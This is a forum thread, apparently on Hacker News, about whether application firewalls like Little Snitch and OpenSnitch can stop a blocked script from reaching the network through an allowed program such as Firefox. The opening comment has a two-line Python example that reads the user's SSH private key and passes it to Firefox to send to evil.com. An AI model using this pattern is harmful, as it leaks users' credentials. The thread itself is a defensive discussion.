[mixedbit]

I'm not a Little Snitch or Open Snitch user, I wonder if these firewalls are able to block requests done with the use of some other, allow-listed program.

Say I run a script `suspicious.py' and I deny this script from making any network requests. I also have firefox which is allowed to make any HTTPS requests. If suspicious.py does something like:

   key = (Path.home() / '.ssh' / 'id_rsa').read_text()
   subprocess.Popen(['firefox', f'https://evil.com/upload/{key}'])

will this request be blocked?

[littlesnitch]

It depends. Little Snitch for Linux has a two level namespace for processes. It takes the process doing the connection and its parent process into account when evaluating rules.

Also: If an interpreter is run via `#!/bin/interpreter` in the script binary, it makes the rule for the script file path, not the interpreter. This does not work when running the script as `interpreter script`, though.

[zamadatix]

With the literal rules described it would not be blocked. A more detailed rule (in Open Snitch at least, not as familiar with the other variants) could match e.g. whether the process's parent tree contained the python binary rather than just if python is the process binding the socket.

[mixedbit]

OK, I see, so a limitation is also that I cannot block an individual script, I need to block a Python interpreter.

[zamadatix]

Not necessarily (with Open Snitch at least), it just depends how complex you want to make your firewall rules and what the specific goal is (block this specific script, block scripts which try to do this activity, block connection to evil.net, block python scripts, etc).

The more granular one gets the more likely they aren't really meaning to ask how to do it in the firewall layer though. E.g. if we take it further to wanting to prevent python -c "specific logic" it's clearer what you can do in the firewall is not necessarily the same as what's practical or useful.

[duskdozer]

Would it silently allow or would you still get the notif or whatever (iirc from littlesnitch years ago)?

[zamadatix]

The allow rule for Firefox is what would suppress the prompt. You probably don't want to have a prompt for every Firefox connection though, so you'd need to come up with some kind of ruleset (or get very annoyed :D).

[arsome]

This gets even more involved when you consider things like loading libraries, there's also the impact of calls like OpenProcess/WriteProcessMemory/CreateRemoteThread (Windows-land versions, though I'm sure similar exists elsewhere).

The "good" Windows firewalls like Outpost and Zone Alarm used to have features to catch this, they'd detect when a process tried to invoke or open a running process which had internet access. They'd also do things like detect when a process tried to write a startup item. This went by names like "Leak Control" but it was basically providing near-complete HIDS features with local control.

[Joel_Mckay]

The SELinux MAC policy should restrict which files and ports each process may access. In general, most modern distro have this feature, but normal users do not go through the rules training and default enable flag setup. =3

[1vuio0pswjnm7]

If the IP address of evil.com is not in the DNS data available to firefox, then it does not matter

Maybe an application firewall is useful if one wants firefox but not suspicious.py to be able to upload to evil.com

But IMHO the criteria chosen by the user to decide access and then configure the firewall accordingly, is evil.com not the name of the application

That's why the example in this comment uses the name "evil"

Otherwise, the application name "suspicious" would be enough